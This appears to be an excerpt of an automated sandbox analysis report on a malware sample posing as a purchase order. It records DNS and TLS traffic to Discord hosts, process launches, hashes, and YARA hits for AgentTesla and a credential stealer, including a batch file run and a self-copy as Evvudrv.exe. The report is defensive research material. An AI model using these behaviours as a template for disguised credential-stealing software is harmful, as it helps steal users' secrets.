Nov 28, 2020 10:27:38.509799004 CET | 8.8.8.8 | 192.168.2.4 | 0xc6f1 | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:28:37.847316027 CET | 8.8.8.8 | 192.168.2.4 | 0x8216 | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:28:37.847316027 CET | 8.8.8.8 | 192.168.2.4 | 0x8216 | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:28:37.847316027 CET | 8.8.8.8 | 192.168.2.4 | 0x8216 | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:28:37.847316027 CET | 8.8.8.8 | 192.168.2.4 | 0x8216 | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:28:37.847316027 CET | 8.8.8.8 | 192.168.2.4 | 0x8216 | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:28:38.022612095 CET | 8.8.8.8 | 192.168.2.4 | 0x9fd6 | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:28:38.022612095 CET | 8.8.8.8 | 192.168.2.4 | 0x9fd6 | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:28:38.022612095 CET | 8.8.8.8 | 192.168.2.4 | 0x9fd6 | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:28:38.022612095 CET | 8.8.8.8 | 192.168.2.4 | 0x9fd6 | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:28:38.022612095 CET | 8.8.8.8 | 192.168.2.4 | 0x9fd6 | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:28:46.394448996 CET | 8.8.8.8 | 192.168.2.4 | 0x5393 | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:28:46.394448996 CET | 8.8.8.8 | 192.168.2.4 | 0x5393 | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:28:46.394448996 CET | 8.8.8.8 | 192.168.2.4 | 0x5393 | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:28:46.394448996 CET | 8.8.8.8 | 192.168.2.4 | 0x5393 | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:28:46.394448996 CET | 8.8.8.8 | 192.168.2.4 | 0x5393 | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:28:46.603054047 CET | 8.8.8.8 | 192.168.2.4 | 0x1248 | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:28:46.603054047 CET | 8.8.8.8 | 192.168.2.4 | 0x1248 | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:28:46.603054047 CET | 8.8.8.8 | 192.168.2.4 | 0x1248 | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:28:46.603054047 CET | 8.8.8.8 | 192.168.2.4 | 0x1248 | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Nov 28, 2020 10:28:46.603054047 CET | 8.8.8.8 | 192.168.2.4 | 0x1248 | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)

HTTPS Packets

Each packet row lists the leaf certificate; the two rows that follow it are the intermediate and root certificates of the same chain as presented by the server.

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Nov 28, 2020 10:27:38.551489115 CET | 162.159.135.233 | 443 | 192.168.2.4 | 49732 | CN=ssl711320.cloudflaressl.com | CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Tue Oct 27 01:00:00 CET 2020 | Thu May 06 01:59:59 CEST 2021 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0 | ce5f3254611a8c095a3d821d44539877
(chain) | | | | | CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Thu Sep 25 02:00:00 CEST 2014 | Tue Sep 25 01:59:59 CEST 2029 | |
(chain) | | | | | CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Thu Jan 01 01:00:00 CET 2004 | Mon Jan 01 00:59:59 CET 2029 | |
Nov 28, 2020 10:28:38.065438986 CET | 162.159.130.233 | 443 | 192.168.2.4 | 49755 | CN=ssl711320.cloudflaressl.com | CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Tue Oct 27 01:00:00 CET 2020 | Thu May 06 01:59:59 CEST 2021 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0 | ce5f3254611a8c095a3d821d44539877
(chain) | | | | | CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Thu Sep 25 02:00:00 CEST 2014 | Tue Sep 25 01:59:59 CEST 2029 | |
(chain) | | | | | CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Thu Jan 01 01:00:00 CET 2004 | Mon Jan 01 00:59:59 CET 2029 | |
Nov 28, 2020 10:28:50.550607920 CET | 162.159.130.233 | 443 | 192.168.2.4 | 49762 | CN=ssl711320.cloudflaressl.com | CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Tue Oct 27 01:00:00 CET 2020 | Thu May 06 01:59:59 CEST 2021 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0 | ce5f3254611a8c095a3d821d44539877
(chain) | | | | | CN=COMODO ECC Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Thu Sep 25 02:00:00 CEST 2014 | Tue Sep 25 01:59:59 CEST 2029 | |
(chain) | | | | | CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Thu Jan 01 01:00:00 CET 2004 | Mon Jan 01 00:59:59 CET 2029 | |

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 10:27:36
Start date: 28/11/2020
Path: C:\Users\user\Desktop\New Order PO20011046.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\New Order PO20011046.exe'
Imagebase: 0x400000
File size: 1311424 bytes
MD5 hash: 310A7CA550B9997D0E0BCAF645530303
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Reputation: low

General

Start time: 10:28:09
Start date: 28/11/2020
Path: C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\svchost.exe
Imagebase: 0x1300000
File size: 44520 bytes
MD5 hash: FA6C268A5B5BDA067A901764D203D433
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Reputation: moderate

General

Start time: 10:28:26
Start date: 28/11/2020
Path: C:\Users\user\Desktop\New Order PO20011046.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\New Order PO20011046.exe
Imagebase: 0x400000
File size: 1311424 bytes
MD5 hash: 310A7CA550B9997D0E0BCAF645530303
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000003.759372640.0000000000574000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.921398684.0000000004B40000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.920852349.00000000038E1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.919758080.0000000002251000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.921099669.0000000004A80000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 10:28:27
Start date: 28/11/2020
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' '
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 10:28:27
Start date: 28/11/2020
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 10:28:27
Start date: 28/11/2020
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' '
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 10:28:28
Start date: 28/11/2020
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 10:28:35
Start date: 28/11/2020
Path: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe'
Imagebase: 0x400000
File size: 1311424 bytes
MD5 hash: 310A7CA550B9997D0E0BCAF645530303
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 69%, ReversingLabs

General

Start time: 10:28:43
Start date: 28/11/2020
Path: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe'
Imagebase: 0x400000
File size: 1311424 bytes
MD5 hash: 310A7CA550B9997D0E0BCAF645530303
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi

Disassembly

Code Analysis
